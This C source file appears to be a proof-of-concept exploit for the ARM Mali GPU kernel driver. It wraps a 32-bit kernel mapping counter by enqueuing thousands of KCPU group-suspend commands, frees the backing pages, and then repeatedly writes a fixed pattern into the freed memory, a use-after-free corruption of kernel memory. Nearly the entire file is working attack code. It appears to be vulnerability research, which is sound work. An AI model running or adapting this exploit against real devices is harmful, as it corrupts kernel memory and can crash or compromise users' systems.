#define _GNU_SOURCE
#include <pthread.h>
#include <fcntl.h>
#include <errno.h>
#include <stdbool.h>
#include <err.h>
#include <stdint.h>
#include <stdio.h>
#include <assert.h>
#include <string.h>
#include <stdlib.h>
#include <unistd.h>
#include <ctype.h>
#include <sys/syscall.h>
#include <sys/ioctl.h>
#include <sys/mman.h>
#include <sys/wait.h>

#define SYSCHK(x) ({          \
  typeof(x) __res = (x);      \
  if (__res == (typeof(x))-1) \
    err(1, "SYSCHK(" #x ")"); \
  __res;                      \
})

static uint64_t ts_to_u64(struct timespec *ts) {
  return ts->tv_sec * (uint64_t)1000000000 + ts->tv_nsec;
}
static uint64_t time_u64(void) {
  struct timespec ts;
  if (clock_gettime(CLOCK_MONOTONIC, &ts)) err(1, "clock_gettime");
  return ts_to_u64(&ts);
}

#define KBASE_IOCTL_TYPE 0x80

#define __u8  uint8_t
#define __u16 uint16_t
#define __u32 uint32_t
#define __u64 uint64_t

struct kbase_ioctl_version_check {
        __u16 major;
        __u16 minor;
};
#define KBASE_IOCTL_VERSION_CHECK \
        _IOWR(KBASE_IOCTL_TYPE, 52, struct kbase_ioctl_version_check)

struct kbase_ioctl_set_flags {
        __u32 create_flags;
};
#define KBASE_IOCTL_SET_FLAGS \
        _IOW(KBASE_IOCTL_TYPE, 1, struct kbase_ioctl_set_flags)

#define BASE_MEM_CSF_EVENT (1UL << 19)
union kbase_ioctl_mem_alloc {
        struct {
                __u64 va_pages;
                __u64 commit_pages;
                __u64 extension;
                __u64 flags;
        } in;
        struct {
                __u64 flags;
                __u64 gpu_va;
        } out;
};
#define KBASE_IOCTL_MEM_ALLOC \
        _IOWR(KBASE_IOCTL_TYPE, 5, union kbase_ioctl_mem_alloc)

struct kbase_ioctl_mem_commit {
        __u64 gpu_addr;
        __u64 pages;
};
#define KBASE_IOCTL_MEM_COMMIT \
        _IOW(KBASE_IOCTL_TYPE, 20, struct kbase_ioctl_mem_commit)

static void mem_commit(int mali_fd, void *gpu_addr, unsigned long pages) {
  struct kbase_ioctl_mem_commit mc = {
    .gpu_addr = (unsigned long)gpu_addr,
    .pages = pages
  };
  SYSCHK(ioctl(mali_fd, KBASE_IOCTL_MEM_COMMIT, &mc));
}

struct kbase_ioctl_mem_flags_change {
	__u64 gpu_va;
	__u64 flags;
	__u64 mask;
};

#define KBASE_IOCTL_MEM_FLAGS_CHANGE \
	_IOW(KBASE_IOCTL_TYPE, 23, struct kbase_ioctl_mem_flags_change)

#define BASE_MEM_DONT_NEED ((uint64_t)1 << 17)

union kbase_ioctl_cs_queue_group_create {
        struct {
                __u64 tiler_mask;
                __u64 fragment_mask;
                __u64 compute_mask;
                __u8 cs_min;
                __u8 priority;
                __u8 tiler_max;
                __u8 fragment_max;
                __u8 compute_max;
                __u8 csi_handlers;
                __u8 padding[2];
                /**
                 * @in.reserved: Reserved
                 */
                __u64 reserved;
        } in;
        struct {
                __u8 group_handle;
                __u8 padding[3];
                __u32 group_uid;
        } out;
};
#define KBASE_IOCTL_CS_QUEUE_GROUP_CREATE                                      \
        _IOWR(KBASE_IOCTL_TYPE, 58, union kbase_ioctl_cs_queue_group_create)

typedef __u8 base_kcpu_queue_id; /* We support up to 256 active KCPU queues */

/**
 * struct kbase_ioctl_kcpu_queue_new - Create a KCPU command queue
 *
 * @id: ID of the new command queue returned by the kernel
 * @padding: Padding to round up to a multiple of 8 bytes, must be zero
 */
struct kbase_ioctl_kcpu_queue_new {
	base_kcpu_queue_id id;
	__u8 padding[7];
};

#define KBASE_IOCTL_KCPU_QUEUE_CREATE \
	_IOR(KBASE_IOCTL_TYPE, 45, struct kbase_ioctl_kcpu_queue_new)

/**
 * struct kbase_ioctl_kcpu_queue_delete - Destroy a KCPU command queue
 *
 * @id: ID of the command queue to be destroyed
 * @padding: Padding to round up to a multiple of 8 bytes, must be zero
 */
struct kbase_ioctl_kcpu_queue_delete {
	base_kcpu_queue_id id;
	__u8 padding[7];
};

#define KBASE_IOCTL_KCPU_QUEUE_DELETE \
	_IOW(KBASE_IOCTL_TYPE, 46, struct kbase_ioctl_kcpu_queue_delete)

/**
 * struct kbase_ioctl_kcpu_queue_enqueue - Enqueue commands into the KCPU queue
 *
 * @addr: Memory address of an array of struct base_kcpu_queue_command
 * @nr_commands: Number of commands in the array
 * @id: kcpu queue identifier, returned by KBASE_IOCTL_KCPU_QUEUE_CREATE ioctl
 * @padding: Padding to round up to a multiple of 8 bytes, must be zero
 */
struct kbase_ioctl_kcpu_queue_enqueue {
	__u64 addr;
	__u32 nr_commands;
	base_kcpu_queue_id id;
	__u8 padding[3];
};

#define KBASE_IOCTL_KCPU_QUEUE_ENQUEUE \
	_IOW(KBASE_IOCTL_TYPE, 47, struct kbase_ioctl_kcpu_queue_enqueue)

#define LOCAL_PAGE_SHIFT 12
#define BASE_MEM_MAP_TRACKING_HANDLE (3ul << LOCAL_PAGE_SHIFT)

typedef enum {
	BASEP_CQS_WAIT_OPERATION_LE = 0,
	BASEP_CQS_WAIT_OPERATION_GT = 1,
} basep_cqs_wait_operation_op;
struct base_cqs_wait_operation_info {
	__u64 addr;
	__u64 val;
	__u8 operation;
	__u8 data_type;
	__u8 padding[6];
};
struct base_kcpu_command_cqs_wait_operation_info {
	__u64 objs;
	__u32 nr_objs;
	__u32 inherit_err_flags;
};
struct base_cqs_wait_info {
	__u64 addr;
	__u32 val;
	__u32 padding;
};
struct base_kcpu_command_cqs_wait_info {
	__u64 objs;
	__u32 nr_objs;
	__u32 inherit_err_flags;
};
struct base_kcpu_command_group_suspend_info {
	__u64 buffer;
	__u32 size;
	__u8 group_handle;
	__u8 padding[3];
};
typedef enum {
	BASEP_CQS_SET_OPERATION_ADD = 0,
	BASEP_CQS_SET_OPERATION_SET = 1,
} basep_cqs_set_operation_op;
typedef enum PACKED {
	BASEP_CQS_DATA_TYPE_U32 = 0,
	BASEP_CQS_DATA_TYPE_U64 = 1,
} basep_cqs_data_type;
struct base_cqs_set_operation_info {
	__u64 addr;
	__u64 val;
	__u8 operation;
	__u8 data_type;
	__u8 padding[6];
};
struct base_kcpu_command_cqs_set_operation_info {
	__u64 objs;
	__u32 nr_objs;
	__u32 padding;
};
enum base_kcpu_command_type {
	BASE_KCPU_COMMAND_TYPE_FENCE_SIGNAL,
	BASE_KCPU_COMMAND_TYPE_FENCE_WAIT,
	BASE_KCPU_COMMAND_TYPE_CQS_WAIT,
	BASE_KCPU_COMMAND_TYPE_CQS_SET,
	BASE_KCPU_COMMAND_TYPE_CQS_WAIT_OPERATION,
	BASE_KCPU_COMMAND_TYPE_CQS_SET_OPERATION,
	BASE_KCPU_COMMAND_TYPE_MAP_IMPORT,
	BASE_KCPU_COMMAND_TYPE_UNMAP_IMPORT,
	BASE_KCPU_COMMAND_TYPE_UNMAP_IMPORT_FORCE,
	BASE_KCPU_COMMAND_TYPE_JIT_ALLOC,
	BASE_KCPU_COMMAND_TYPE_JIT_FREE,
	BASE_KCPU_COMMAND_TYPE_GROUP_SUSPEND,
	BASE_KCPU_COMMAND_TYPE_ERROR_BARRIER
};
struct base_kcpu_command {
	__u8 type;
	__u8 padding[sizeof(__u64) - sizeof(__u8)];
	union {
		//struct base_kcpu_command_fence_info fence;
		struct base_kcpu_command_cqs_wait_info cqs_wait;
		//struct base_kcpu_command_cqs_set_info cqs_set;
		struct base_kcpu_command_cqs_wait_operation_info cqs_wait_operation;
		struct base_kcpu_command_cqs_set_operation_info cqs_set_operation;
                /*
		struct base_kcpu_command_import_info import;
		struct base_kcpu_command_jit_alloc_info jit_alloc;
		struct base_kcpu_command_jit_free_info jit_free;
                */
		struct base_kcpu_command_group_suspend_info suspend_buf_copy;
		__u64 padding[2]; /* No sub-struct should be larger */
	} info;
};

#define CLOBBER_PAGES 10000

static int setup_mali(void) {
  int mali_fd = SYSCHK(open("/dev/mali0", O_RDWR));
  struct kbase_ioctl_version_check vc = { .major = 11, .minor = 11 };
  SYSCHK(ioctl(mali_fd, KBASE_IOCTL_VERSION_CHECK, &vc));
  struct kbase_ioctl_set_flags set_flags = { .create_flags = 0 };
  SYSCHK(ioctl(mali_fd, KBASE_IOCTL_SET_FLAGS, &set_flags));
  void *tracking_page = SYSCHK(mmap(NULL, 0x1000, PROT_NONE, MAP_SHARED,
        mali_fd, BASE_MEM_MAP_TRACKING_HANDLE));
  return mali_fd;
}

static void mem_flags_change(int mali_fd, void *gpu_addr, uint64_t flags, uint64_t mask) {
  struct kbase_ioctl_mem_flags_change mfc = {
    .gpu_va = (unsigned long)gpu_addr,
    .flags = flags,
    .mask = mask
  };
  SYSCHK(ioctl(mali_fd, KBASE_IOCTL_MEM_FLAGS_CHANGE, &mfc));
}

static void set_dontneed(int mali_fd, void *gpu_addr, bool dontneed) {
  mem_flags_change(mali_fd, gpu_addr, (dontneed ? BASE_MEM_DONT_NEED : 0), BASE_MEM_DONT_NEED);
}

static void kcpu_enqueue(int mali_fd, int queue_id, struct base_kcpu_command *cmd, bool ebusy_ok) {
retry:;
  struct kbase_ioctl_kcpu_queue_enqueue kqe = {
    .addr = (unsigned long)cmd,
    .nr_commands = 1,
    .id = queue_id
  };
  int ret = ioctl(mali_fd, KBASE_IOCTL_KCPU_QUEUE_ENQUEUE, &kqe);
  if (ret == -1 && ebusy_ok && errno == EBUSY) {
    sched_yield();
    goto retry;
  }
  SYSCHK(ret);
}

/* wait for *ptr > 0 */
static void kcpu_enqueue_wait(int mali_fd, int queue_id, void *ptr) {
  struct base_cqs_wait_info info = {
    .addr = (unsigned long)ptr,
    .val = 0
  };
  struct base_kcpu_command cmd = {
    .type = BASE_KCPU_COMMAND_TYPE_CQS_WAIT,
    .info.cqs_wait = {
      .objs = (unsigned long)&info,
      .nr_objs = 1
    }
  };
  kcpu_enqueue(mali_fd, queue_id, &cmd, false);
}

static void kcpu_enqueue_suspend(int mali_fd, int queue_id, int queue_group_id,
                                 void *buffer, size_t buffer_size) {
  struct base_kcpu_command cmd = {
    .type = BASE_KCPU_COMMAND_TYPE_GROUP_SUSPEND,
    .info.suspend_buf_copy = {
      .buffer = (unsigned long)buffer,
      .size = buffer_size,
      .group_handle = queue_group_id
    }
  };
  kcpu_enqueue(mali_fd, queue_id, &cmd, false);
}

/* requires 16-byte aligned address */
static void kcpu_enqueue_set_operation_process(int mali_fd, int queue_id, void *addr) {
  struct base_cqs_set_operation_info info = {
    .addr = (unsigned long)addr,
    .val = 0xAAAAAAAAAAAAAAAAUL,
    .operation = BASEP_CQS_SET_OPERATION_SET,
    .data_type = BASEP_CQS_DATA_TYPE_U64
  };
  struct base_kcpu_command cmd = {
    .type = BASE_KCPU_COMMAND_TYPE_CQS_SET_OPERATION,
    .info.cqs_set_operation = {
      .objs = (unsigned long)&info,
      .nr_objs = 1
    }
  };
  kcpu_enqueue(mali_fd, queue_id, &cmd, true);
}

static int create_kcpu_queue(int mali_fd) {
  struct kbase_ioctl_kcpu_queue_new kqc = {  };
  SYSCHK(ioctl(mali_fd, KBASE_IOCTL_KCPU_QUEUE_CREATE, &kqc));
  return kqc.id;
}

static void delete_kcpu_queue(int mali_fd, int queue_id) {
  struct kbase_ioctl_kcpu_queue_delete kqd = { .id = queue_id };
  SYSCHK(ioctl(mali_fd, KBASE_IOCTL_KCPU_QUEUE_DELETE, &kqd));
}

static int create_queue_group(int mali_fd) {
  union kbase_ioctl_cs_queue_group_create qgc = {};
  SYSCHK(ioctl(mali_fd, KBASE_IOCTL_CS_QUEUE_GROUP_CREATE, &qgc));
  return qgc.out.group_handle;
}

static void *gpu_alloc(int mali_fd, int num_pages, uint64_t extra_flags) {
  union kbase_ioctl_mem_alloc ma = { .in = {
    .va_pages = num_pages,
    .commit_pages = num_pages,
    .flags = 0xf/*RW for CPU+GPU*/ | extra_flags
  }};
  SYSCHK(ioctl(mali_fd, KBASE_IOCTL_MEM_ALLOC, &ma));
  assert(ma.out.flags & (1<<13)/*BASE_MEM_SAME_VA*/);
  void *gpu_va = SYSCHK(mmap(
      NULL, num_pages * 0x1000UL, PROT_READ|PROT_WRITE, MAP_SHARED, mali_fd,
      ma.out.gpu_va
  ));
  memset((void*)gpu_va, '\0', 0x1000);
  return gpu_va;
}

int main(void) {
  if (getuid() != 0)
    errx(1, "need uid 0 for drop_caches");

  int mali_fd = setup_mali();
  int queue_group = create_queue_group(mali_fd);

  /* BASE_MEM_CSF_EVENT implies KBASE_REG_PERMANENT_KERNEL_MAPPING */
  char *uaf_alloc = gpu_alloc(mali_fd, CLOBBER_PAGES, BASE_MEM_CSF_EVENT);
  char *wait_alloc = gpu_alloc(mali_fd, 1, BASE_MEM_CSF_EVENT);

  /* make kernel_map_count wrap to zero */
  uint64_t last_ts = time_u64();
  unsigned long sum_create = 0, sum_enqueue_wait = 0, sum_enqueue_suspend = 0, sum_delete = 0;
  uint64_t kernel_map_count_target = ((uint64_t)1 << 32);
  unsigned int round = 0;
  uint64_t last_print_map_count = 1;
  for (uint64_t kernel_map_count = 1 /*+ 0xffff0000U*/; kernel_map_count < kernel_map_count_target; round++) {
    if ((round & 0xff) == 0) {
      uint64_t cur_ts = time_u64();
      uint64_t ts_diff = cur_ts - last_ts;
      uint64_t ns_per_increment = ts_diff / (kernel_map_count - last_print_map_count);
      uint64_t total_ns_estimate = ns_per_increment * ((uint64_t)1 << 32);
      uint64_t total_min_estimate = total_ns_estimate / ((uint64_t)1000*1000*1000*60);
      printf("progress: 0x%08lx, expected total time %lu minutes\tsum_create=%lu sum_enqueue_wait=%lu sum_enqueue_suspend=%lu sum_delete=%lu\n",
             (unsigned long)kernel_map_count, (unsigned long)total_min_estimate,
             sum_create, sum_enqueue_wait, sum_enqueue_suspend, sum_delete);
      last_ts = cur_ts;
      last_print_map_count = kernel_map_count;
    }
    uint64_t ts_1 = time_u64();
    int queue_id = create_kcpu_queue(mali_fd);
    uint64_t ts_2 = time_u64();
    kcpu_enqueue_wait(mali_fd, queue_id, wait_alloc);
    uint64_t ts_3 = time_u64();
    uint64_t map_count_increment = kernel_map_count_target - kernel_map_count;
    if (map_count_increment > 254) // under KBASEP_KCPU_QUEUE_SIZE
      map_count_increment = 254;
    for (int i=0; i<map_count_increment; i++) {
      kcpu_enqueue_suspend(mali_fd, queue_id, queue_group, uaf_alloc, CLOBBER_PAGES * 0x1000UL);
    }
    kernel_map_count += map_count_increment;
    uint64_t ts_4 = time_u64();
    delete_kcpu_queue(mali_fd, queue_id);
    uint64_t ts_5 = time_u64();

    sum_create += (ts_2 - ts_1);
    sum_enqueue_wait += (ts_3 - ts_2);
    sum_enqueue_suspend += (ts_4 - ts_3);
    sum_delete += (ts_5 - ts_4);
  }
  printf("==== COUNTER WRAP DONE ====\n");
  sleep(10);

#if 0
  /* zap the pages onto the freelist */
  char *drain_alloc = gpu_alloc(mali_fd, CLOBBER_PAGES, 0);
  mem_commit(mali_fd, uaf_alloc, 0);
#endif

  /* free the pages */
  set_dontneed(mali_fd, uaf_alloc, true);
  printf("==== DONTNEED SUCCESS ====\n");

  system("echo 3 > /proc/sys/vm/drop_caches");

  int reuse_queue_id = create_kcpu_queue(mali_fd);
  unsigned long iter = 0;
  while (1) {
    for (unsigned long off = 0; off < CLOBBER_PAGES * 0x1000UL; off += 16) {
      kcpu_enqueue_set_operation_process(mali_fd, reuse_queue_id, uaf_alloc + off);
    }
    iter++;
    fprintf(stderr, "\rclobber iteration %lu", iter);
  }

#if 0
  struct base_cqs_wait_operation_info obj = {
    .addr = gpu_va + 0xffc,
    .val = 0,
    .operation = BASEP_CQS_WAIT_OPERATION_LE, // `<memval> <= .val`
    .data_type = BASEP_CQS_DATA_TYPE_U32
  };
  struct base_kcpu_command cmd = {
    .type = BASE_KCPU_COMMAND_TYPE_CQS_WAIT_OPERATION,
    .info = {
      .cqs_wait_operation = {
        .objs = (unsigned long)&obj,
        .nr_objs = 1,
        .inherit_err_flags = 0xffffffffU
      }
    }
  };
#endif
}
